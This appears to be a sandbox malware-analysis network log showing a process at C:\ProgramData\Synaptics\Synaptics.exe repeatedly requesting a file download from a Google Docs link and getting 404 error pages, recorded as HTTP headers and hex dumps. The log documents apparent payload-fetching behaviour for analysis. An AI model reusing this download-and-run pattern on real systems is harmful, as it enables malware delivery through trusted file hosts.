                                                                                                                                                                                        2022-05-17 11:32:06 UTC858INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 50 4c 46 56 6c 65 2b 35 6e 64 59 69 6f 48 42 38 39 39 6f 4c 47 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="PLFVle+5ndYioHB899oLGQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:32:06 UTC860INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:32:06 UTC860INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        283192.168.2.350071142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:06 UTC857OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:06 UTC860INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:06 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-mpXSzzs5QMjUDVaOo2nTNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:06 UTC861INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:32:06 UTC861INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 57 64 44 72 78 41 43 6c 4b 41 76 4f 49 75 65 77 72 59 47 6d 73 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="WdDrxAClKAvOIuewrYGmsw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:32:06 UTC863INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:32:06 UTC863INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        284192.168.2.350072142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:06 UTC860OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:06 UTC863INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:06 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-4xwjgAPD4QSd4HCHvCuqOA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:06 UTC865INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 68 69 74 55 32 61 67 36 52 2f 69 39 44 36 32 32 4e 7a 44 78 6f 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="hitU2ag6R/i9D622NzDxoQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:32:06 UTC866INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:32:06 UTC866INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        285192.168.2.350073142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:06 UTC863OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:07 UTC866INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:06 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-VnWejGAfP6C0GW4Eb7GLPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:07 UTC868INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:32:07 UTC868INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 2f 68 49 6a 36 39 64 58 4d 4a 52 5a 34 54 43 49 69 51 4d 45 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0/hIj69dXMJRZ4TCIiQMEQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:32:07 UTC869INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:32:07 UTC869INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        286192.168.2.350074142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:07 UTC866OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:07 UTC869INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:07 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-d+MJO/LyIah4OBGN2Tx53Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:07 UTC871INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:32:07 UTC871INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 45 79 4c 6b 39 43 4e 79 35 48 39 52 56 4d 79 4c 49 4e 79 38 59 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="EyLk9CNy5H9RVMyLINy8YA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:32:07 UTC872INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:32:07 UTC872INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        287192.168.2.350075142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:07 UTC869OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:07 UTC872INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:07 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-3ChlxztYlFXtEetX1QhjjA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
